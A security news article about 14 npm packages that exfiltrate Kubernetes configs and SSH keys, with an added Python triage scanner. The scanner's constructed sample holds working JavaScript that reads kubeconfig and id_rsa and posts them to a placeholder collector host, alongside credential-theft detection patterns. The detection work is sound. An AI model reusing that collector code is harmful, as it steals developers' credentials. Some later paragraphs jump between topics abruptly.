Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.
Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts.
Along with Kubernetes config and SSH keys, the modules are also capable of harvesting system metadata such as username, IP address, and hostname, all of which are transmitted to a domain named app.threatest[.]com.
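The behaviour described above (a lifecycle script that runs on install, reads kubeconfig and SSH key paths, collects host metadata, and posts it to a hard-coded domain) is exactly the pattern a static pre-install triage can catch. The script below is an added example, not code from the article and not Sonatype's or Phylum's tooling. The sample package it scans is constructed here for the demo; its package name, file names and collector domain are hypothetical and do not correspond to any of the packages listed above.

```python
"""Static triage of an unpacked npm package for install-time secret exfiltration.

Added example. Flags the four behaviours the article describes: lifecycle scripts
that run on `npm install`, reads of Kubernetes/SSH credential paths, host metadata
collection, and outbound HTTP to a hard-coded domain.
"""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs automatically when the package is installed as a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Indicator regexes keyed by the behaviour they suggest (tuned for Node.js source).
INDICATORS = {
    "kubeconfig_read": re.compile(r"\.kube[/\\]config|KUBECONFIG"),
    "ssh_key_read": re.compile(r"\.ssh[/\\]|id_(rsa|ed25519|ecdsa)"),
    "host_metadata": re.compile(r"os\.(userInfo|hostname|networkInterfaces)\s*\("),
    "outbound_http": re.compile(r"\b(https?\.request|fetch|axios\.(post|get))\s*\("),
}
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def scan_package(pkg_dir):
    """Return lifecycle scripts, matched indicators (per file) and hard-coded domains."""
    pkg_dir = Path(pkg_dir)
    findings = {"lifecycle_scripts": {}, "indicators": {}, "domains": set()}
    manifest = json.loads((pkg_dir / "package.json").read_text())
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings["lifecycle_scripts"][hook] = cmd
    for js in pkg_dir.rglob("*.js"):
        text = js.read_text(errors="ignore")
        rel = str(js.relative_to(pkg_dir))
        for name, rx in INDICATORS.items():
            if rx.search(text):
                findings["indicators"].setdefault(name, []).append(rel)
        findings["domains"].update(DOMAIN_RE.findall(text))
    return findings


def risk_score(findings):
    """Runs on install (+1), touches secrets (+2), talks to a fixed domain (+2)."""
    score = 0
    if findings["lifecycle_scripts"]:
        score += 1
    if {"kubeconfig_read", "ssh_key_read"} & findings["indicators"].keys():
        score += 2
    if "outbound_http" in findings["indicators"] and findings["domains"]:
        score += 2
    return score


# Constructed sample: a package whose postinstall hook collects secrets.
# The scope, file name and domain are hypothetical placeholders.
SAMPLE_MANIFEST = {
    "name": "@example-scope/hooks",
    "version": "1.0.0",
    "scripts": {"postinstall": "node collect.js"},
}
SAMPLE_COLLECTOR = r"""
const fs = require('fs'); const os = require('os'); const https = require('https');
const home = os.homedir();
const payload = {
  user: os.userInfo().username, host: os.hostname(),
  kube: fs.readFileSync(home + '/.kube/config', 'utf8'),
  ssh: fs.readFileSync(home + '/.ssh/id_rsa', 'utf8'),
};
const req = https.request('https://collector.example.invalid/upload', {method: 'POST'});
req.end(JSON.stringify(payload));
"""


def build_sample_package():
    """Write the constructed malicious sample to a temp dir and return its path."""
    d = Path(tempfile.mkdtemp())
    (d / "package.json").write_text(json.dumps(SAMPLE_MANIFEST))
    (d / "collect.js").write_text(SAMPLE_COLLECTOR)
    return d


def build_benign_package():
    """Control case: no lifecycle hooks, no secret paths, no network."""
    d = Path(tempfile.mkdtemp())
    (d / "package.json").write_text(json.dumps({"name": "@example-scope/utils", "version": "1.0.0"}))
    (d / "index.js").write_text("module.exports = (a, b) => a + b;\n")
    return d


if __name__ == "__main__":
    for builder in (build_sample_package, build_benign_package):
        f = scan_package(builder())
        print(f"{builder.__name__}: score={risk_score(f)} {f}")
```

Run it against a package unpacked with `npm pack` (or `npm view <pkg> dist.tarball` plus `tar xzf`) before it is ever installed, since installing is what triggers the hook. The scorer is deliberately conservative: a package that merely has a postinstall script scores 1, and only the combination of install-time execution, credential reads and outbound traffic reaches the top score.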
The disclosure comes a little over a week after Sonatype detected counterfeit npm packages that exploit a technique known as dependency confusion to impersonate internal packages purportedly used by PayPal Zettle and Airbnb developers as part of an ethical research experiment.
That said, threat actors continue to target open-source registries like npm and PyPI with cryptojackers, infostealers, and other novel malware to compromise developer systems and ultimately poison the software supply chain.
“This targeted approach indicates a sophisticated understanding of cryptocurrency security and suggests that the attacker is aiming to capture and exfiltrate sensitive cryptographic keys for unauthorized access to Ethereum wallets or other secured digital assets,” the company said.
Another case of an attempted supply chain attack involved a crafty npm package called gcc-patch that masquerades as a bespoke GCC compiler but actually harbors a cryptocurrency miner that “covertly taps into the computational power of innocent developers, aiming to profit at their expense.”
The campaign specifically targets Apple macOS users, indicating that malware in open-source package repositories is not only becoming increasingly prevalent but is also singling out operating systems beyond Windows.
“The author of these packages is staging a broad campaign against software developers,” Phylum noted in an analysis. “The end goal of this campaign remains unclear.”